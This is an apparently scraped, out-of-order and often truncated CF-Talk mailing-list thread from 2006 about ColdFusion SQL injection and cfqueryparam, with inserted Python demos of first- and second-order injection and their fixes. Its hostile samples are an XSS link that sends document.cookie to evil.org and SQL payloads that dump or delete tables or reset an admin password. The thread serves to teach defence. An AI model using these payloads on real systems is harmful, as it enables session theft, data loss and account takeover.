On 8/25/06, Robertson-Ravo, Neil (RX) <[EMAIL PROTECTED]>
wrote:
>
> No the question was not ColdFusion, the question was why re-invent the
> wheel
> - just use cfquery and cfqueryparam.
Re-inventing the wheel is relative to what you're doing and the frame of
reference.
I can think of many reaso
I think I am going to try an object repository using the (under used)
coldfusion JWS service.
I think I did this before but I have no idea why I dropped the idea it's so
simple to do.
JWS example
import org.hsqldb.WebServer;
import java.io.*;
public class MyWebserverObject extends WebServer imp
-Original Message-
From: Dan Plesse
To: CF-Talk
Sent: Fri Aug 25 20:08:18 2006
Subject: Re: coldfusion sql injection
Mark,
We all have time frames and I was just offering a suggestion that has saved
me time with other clients.
I wish you success on your endeavor.
Teddy
~|
Introducing the Fusion Authority Quarterly Update. 80 pages of hard-hit
Objects stored in a repository are very much an Object Oriented DB concept.
CF doesn't really support this idea of storing an object. Most of this is
accomplished by storing data in an RDBMS.
Centralizing where you update metadata for queries is very much like ORM
models. An example would be Reacto
Subject: Re: coldfusion sql injection
If you spend that much time maintaining queries, perhaps you need to
organize the queries into an ORM model and alleviate some routine tasks.
Teddy
One of the things I am thinking about doing today is running an outside process
(hsqldb web server started by CF using cfexecute) which contains all my
objects which coldfusion uses like all my PrepareStatements and cfquery
objects. I wanted to use objects which were saved in a DB now this is my
chance
> From: Dan Plesse
> To: CF-Talk
> Sent: Fri Aug 25 17:47:24 2006
> Subject: Re: coldfusion sql injection
>
> My example using PrepareStatements.
>
> This makes a "sql injection attack" a thing of the past and its also
> faster.
>
>
> PreparedStatement ps
eries. Doing it the
way described below ... I might as well use ASP :)
-Mark
-Original Message-
From: Dave Watts [mailto:[EMAIL PROTECTED]
Sent: Friday, August 25, 2006 12:08 PM
To: CF-Talk
Subject: RE: coldfusion sql injection
> My example using PrepareStatements.
>
> This makes a "sql injection attack" a thing of the past and
> its also faster.
While you might have perfectly valid reasons for doing this, it is what
CFQUERYPARAM does for you, if you're using CFQUERY. If I wanted to write all
my database connection stu
-Original Message-
From: Dan Plesse
To: CF-Talk
Sent: Fri Aug 25 17:47:24 2006
Subject: Re: coldfusion sql injection
My example using PreparedStatement.
This makes a "sql injection attack" a thing of the past and it's also faster.
// The SQL text is compiled once with placeholders; the values are bound
// afterwards and sent to the server separately, so they are never parsed as SQL.
PreparedStatement ps = con.prepareStatement(
    "INSERT INTO MYTABLE VALUES (?, ?, ?, ?)");
ps.setInt(1, 3);
ps.setString(2, "something");
ps.setString(3, "and");
ps.setString(4, "other");
ps.executeUpdate();
>I will pipe up here, and ask one question though. And the reason I ask this
> is that it's maybe different for me, but I tend not to use the cfqueryparam
> in cffunctions that have cfarguments and are typed.
>
> I find it is not required as the function will throw an error anyway, and
> the only
I have a good example of injection and XSS here...
http://mkruger.cfwebtools.com/index.cfm?mode=alias&alias=security.pyramid.code
-Original Message-
So there's the question. Can someone provide an example of a
working sql injection attack?
On 8/24/06, Dave Watts <[EMAIL PROTECTED]> wrote:
>
> > More evil is stuff like:
> >
> > http://trusted.org/search.cgi?criteria=
> I will pipe up here, and ask one question though. And the
> reason I ask this is that it's maybe different for me, but I
> tend not to use the cfqueryparam in cffunctions that have
> cfarguments and are typed.
>
> I find it is not required as the function will throw an error
> anyway, and t
> So there's the question. Can someone provide an example of a
> working sql injection attack?
Sure:
http://www.ngssoftware.com/papers/advanced_sql_injection.pdf
There's a whole section in there about multi-step SQL injection attacks
against systems that escape all single quotes. They are certa
CFQUERYPARAM binds the argument into the statement, preventing it from
being interpreted as SQL.
On 8/25/06, Andrew Scott <[EMAIL PROTECTED]> wrote:
> I will pipe up here, and ask one question though. And the reason I ask this
> is that it's maybe different for me, but I tend not to use the cfquer
I will pipe up here, and ask one question though. And the reason I ask this
is that it's maybe different for me, but I tend not to use the cfqueryparam
in cffunctions that have cfarguments and are typed.
I find it is not required as the function will throw an error anyway, and
the only time that
This has been necessary for ages and I'm glad they finally added it
(not that I've used a DW code gen wizard for anything, apart from the
IE ActiveX activation thing, in years).
On 8/25/06, Dave Watts <[EMAIL PROTECTED]> wrote:
> Even the Dreamweaver 8 code-generation
> wizards generate CFQUERYP
More evil is stuff like:
http://trusted.org/search.cgi?criteria=http://evil.org/badkama.js%27>>"> Go to trusted.org
OR
http://trusted.org/account.asp?ak=
document.location.replace
('http://evil.org/steal.cgi?'+document.cookie);
Re: coldfusion sql injection
I precompile everything. No DSN needed and since cfquery is serializable I
make a unique backup copy of tables for fun.
Example application.cfm
Some CFC
that's it!
On 8/23/06, Jochem van Dieten <[EMAIL PROTECTED]> wrote:
>
> Russ wrote:
> > So there's the question. Can someone provi
Russ wrote:
> So there's the question. Can someone provide an example of a working sql
> injection attack?
Plenty have been posted in this thread. Even more are in the archives. And if
that isn't enough, check the archives of the penetration-testing securityfocus
mailing list.
Jochem
I posted one earlier. Replace a numeric value that is sent via form or URL
with some SQL and the SQL will execute.
Snake
-Original Message-
From: Russ [mailto:[EMAIL PROTECTED]
Sent: 23 August 2006 19:16
To: CF-Talk
Subject: RE: coldfusion sql injection
So there's the question. Can someone provide an example of a working sql
injection attack?
> -Original Message-
> From: Jochem van Dieten [mailto:[EMAIL PROTECTED]
> Sent: Wednesday, August 23, 2006 2:05 PM
> To: CF-Talk
> Subject: Re: coldfusion sql injection
>
Russ wrote:
> The string is also autoescaped even if you don't use cfqueryparam... at
> least on SQL server. Is it not with other DB systems?
It is. But that is not enough.
Jochem
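Dave Watts' pointer to the NGS paper's section on multi-step injection against systems that escape every single quote, and Jochem's "It is. But that is not enough" about CF's autoescaping, are the same point. Here it is worked through as an added example; this is not code from the thread, and it uses Python with an in-memory SQLite database standing in for the ColdFusion-to-SQL Server path under discussion. The users table, the admin account and the register/change_password routines are constructed for illustration. Quote doubling protects the first query; the stored value then re-enters a later query as "trusted" data without escaping, and only a bound parameter (what cfqueryparam supplies) is indifferent to where the value came from.

```python
import sqlite3

def escape_quotes(s):
    # The "autoescape" the thread discusses: single quotes doubled on output.
    return s.replace("'", "''")

def make_db():
    # Constructed sample data: one pre-existing admin account.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT PRIMARY KEY, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 'original-admin-pw')")
    return conn

def register(conn, username, password):
    # Step 1: attacker-supplied input goes in with quotes doubled. This INSERT
    # is not injectable; it simply stores the hostile name intact.
    sql = ("INSERT INTO users VALUES ('" + escape_quotes(username) + "', '"
           + escape_quotes(password) + "')")
    conn.execute(sql)

def current_username(conn, session_username):
    # Re-read the account record, as an app would from a session or profile.
    # Still escaped: the hostile name survives the round trip unchanged.
    row = conn.execute("SELECT username FROM users WHERE username = '"
                       + escape_quotes(session_username) + "'").fetchone()
    return row[0]

def change_password_vulnerable(conn, session_username, new_password):
    # Step 2: the username now comes from our own table, so it is treated as
    # trusted and concatenated without escaping. The quote the attacker chose
    # in step 1 closes the literal and "--" comments out the rest of the WHERE.
    stored = current_username(conn, session_username)
    sql = ("UPDATE users SET password = '" + escape_quotes(new_password)
           + "' WHERE username = '" + stored + "'")
    conn.execute(sql)

def change_password_safe(conn, session_username, new_password):
    # A bound parameter makes the origin of the value irrelevant: whatever it
    # contains is compared, never parsed.
    stored = current_username(conn, session_username)
    conn.execute("UPDATE users SET password = ? WHERE username = ?",
                 (new_password, stored))

def password_of(conn, username):
    return conn.execute("SELECT password FROM users WHERE username = ?",
                        (username,)).fetchone()[0]

def run(change_password):
    # Register the hostile name, then change "our own" password through the
    # given routine. Returns (admin's password, attacker's password) afterwards.
    conn = make_db()
    attacker = "admin'--"
    register(conn, attacker, "attacker-pw")
    change_password(conn, attacker, "pwned")
    return password_of(conn, "admin"), password_of(conn, attacker)

if __name__ == "__main__":
    print("escaping only:", run(change_password_vulnerable))  # ('pwned', 'attacker-pw')
    print("bound params: ", run(change_password_safe))        # ('original-admin-pw', 'pwned')
```

The escaping regime is applied consistently to every piece of request input and still loses, because the second query's value is not request input. That is the reason binding is the only approach whose safety does not depend on tracing where each string has been.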
The string is also autoescaped even if you don't use cfqueryparam... at
least on SQL server. Is it not with other DB systems?
Autoescape is done by CF, so it works for any DB.
--
___
REUSE CODE! Use custom tags;
See http://www.contentbox.com/claude/customtags
The string is also autoescaped even if you don't use cfqueryparam... at
least on SQL server. Is it not with other DB systems?
> -Original Message-
> From: Jeff Guillaume [mailto:[EMAIL PROTECTED]
> Sent: Wednesday, August 23, 2006 10:19 AM
> To: CF-Talk
> Subject
Let alone the security aspect, it also improves performance by causing your
database server to bind the variables before executing the query.
Straight from Macromedia:
http://tinyurl.com/oo49m (link to docs)
- Allows the use of SQL bind parameters, which improves performance.
- Ensures that va
Rick Root wrote:
> Snake wrote:
>> Select * from table
>> Where x = #form.value#
>>
>> And form.value = (delete from table)
>
> or
>
And that catches the form variable "3e4" how exactly?
> is *NEVER* "required" if you're willing to code the other
> stuff.
>
> B
--Original Message-
From: Jochem van Dieten
To: CF-Talk
Sent: Wed Aug 23 09:10:26 2006
Subject: Re: coldfusion sql injection
Russ wrote:
> That's the thing... When is cfqueryparam REALLY necessary for security? I
> want to see some examples that require cfqueryparam.
Always. For the simple reason that you are not able to prove that any other
solution is secure.
Jochem
Well, we don't NEED to use CF to write web apps either, but it makes
my job a lot easier.
On 8/23/06, Russ <[EMAIL PROTECTED]> wrote:
> Where x is numeric... which can be fixed by using a lot of other things
> other than cfqueryparam, such as
>
>
> > Select * from table
> > Where x = #Val(form.val
security.
Russ
> -Original Message-
> From: Snake [mailto:[EMAIL PROTECTED]
> Sent: Tuesday, August 22, 2006 8:13 PM
> To: CF-Talk
> Subject: RE: coldfusion sql injection
>
> Select * from table
> Where x = #form.value#
>
> And form.value = (delete from table
Snake wrote:
> Select * from table
> Where x = #form.value#
>
> And form.value = (delete from table)
or
is *NEVER* "required" if you're willing to code the other
stuff.
But if you get in the habit of NOT using cfqueryparam, and you code the
other stuff, you have to worry about
Select * from table
Where x = #form.value#
And form.value = (delete from table)
-Original Message-
From: Russ [mailto:[EMAIL PROTECTED]
Sent: 22 August 2006 23:57
To: CF-Talk
Subject: RE: coldfusion sql injection
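Snake's example above, worked through as an added example that is not code from the thread. Python with an in-memory SQLite database stands in for the CF-to-database path; the items table is constructed data; sqlite3's executescript is used only to model a driver that accepts a batch of statements in one call, which is what the "delete from table" payload relies on (SQL Server's driver does, many others do not). It also shows the two things the cfqueryparam side of the argument gets for free: a type check that rejects anything not an integer, including the "3e4" case raised later in the thread, and a bound parameter that the database never parses as SQL.

```python
import re
import sqlite3

def make_db():
    # Constructed sample data: a table with a numeric key column x.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE items (x INTEGER PRIMARY KEY, name TEXT)")
    conn.executemany("INSERT INTO items VALUES (?, ?)",
                     [(1, "alpha"), (2, "beta"), (3, "gamma")])
    return conn

def escape_quotes(s):
    # Models the automatic doubling of single quotes that the thread credits
    # CF with doing when a variable is interpolated into cfquery text.
    return s.replace("'", "''")

def vulnerable_lookup(conn, form_value):
    # SELECT * FROM table WHERE x = #form.value#
    # The comparison is numeric, so there are no quotes around the value and
    # quote doubling has nothing to act on; the input becomes part of the SQL.
    sql = "SELECT x, name FROM items WHERE x = " + escape_quotes(form_value)
    return conn.execute(sql).fetchall()

def vulnerable_lookup_batched(conn, form_value):
    # Same query on a driver that runs several statements per call.
    # executescript is used here purely to model that behaviour.
    # Returns the number of rows left in the table afterwards.
    sql = "SELECT x, name FROM items WHERE x = " + escape_quotes(form_value)
    conn.executescript(sql)
    return conn.execute("SELECT count(*) FROM items").fetchone()[0]

def strict_int(form_value):
    # The kind of type check cfqueryparam's cf_sql_integer performs: only an
    # optionally signed run of digits passes. A looser "looks numeric" test
    # would also let "3e4" through.
    if not re.fullmatch(r"\s*[+-]?\d+\s*", form_value):
        raise ValueError("not an integer: %r" % form_value)
    return int(form_value)

def safe_lookup(conn, form_value):
    # WHERE x = <cfqueryparam value="#form.value#" cfsqltype="cf_sql_integer">
    # Type-check, then bind: the value travels separately from the SQL text,
    # so it can only ever be compared against x, never executed.
    value = strict_int(form_value)
    return conn.execute("SELECT x, name FROM items WHERE x = ?",
                        (value,)).fetchall()

if __name__ == "__main__":
    print(vulnerable_lookup(make_db(), "2"))              # [(2, 'beta')]
    print(vulnerable_lookup(make_db(), "0 OR 1=1"))       # all three rows
    print(vulnerable_lookup_batched(make_db(), "1; DELETE FROM items"))  # 0
    print(safe_lookup(make_db(), "2"))                    # [(2, 'beta')]
    for bad in ("0 OR 1=1", "3e4", "1; DELETE FROM items"):
        try:
            safe_lookup(make_db(), bad)
        except ValueError as e:
            print("rejected:", e)
```

The "0 OR 1=1" payload is the one that works everywhere, since it needs no statement separator and no quotes: escaping never sees it and it returns every row. Whether the "delete from table" variant works depends only on whether the driver accepts batched statements, which is a property of the deployment rather than of the application code, so it is not something the page author can code around.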
That's the thing... When is cfqueryparam REALLY necessary for security? I
want to see some examples that require cfqueryparam.
Russ
> -Original Message-
> From: Jeff Guillaume [mailto:[EMAIL PROTECTED]
> Sent: Tuesday, August 22, 2006 6:53 PM
> To: CF-Talk
> Subject
I just make sure I always scrub user-entered data when possible, but at the
very least you should use to pass data into queries.
---
Jeff Guillaume
Kazoomis
www.kazoomis.com
Now, it is my belief that CF auto escapes single quotes, so sql injection
into a string is not possible. I believe it's still possible if you have a
number, but pass in a string, but that can be defeated by using VAL.
Someone pointed me to an article from 2 years ago that describes how to do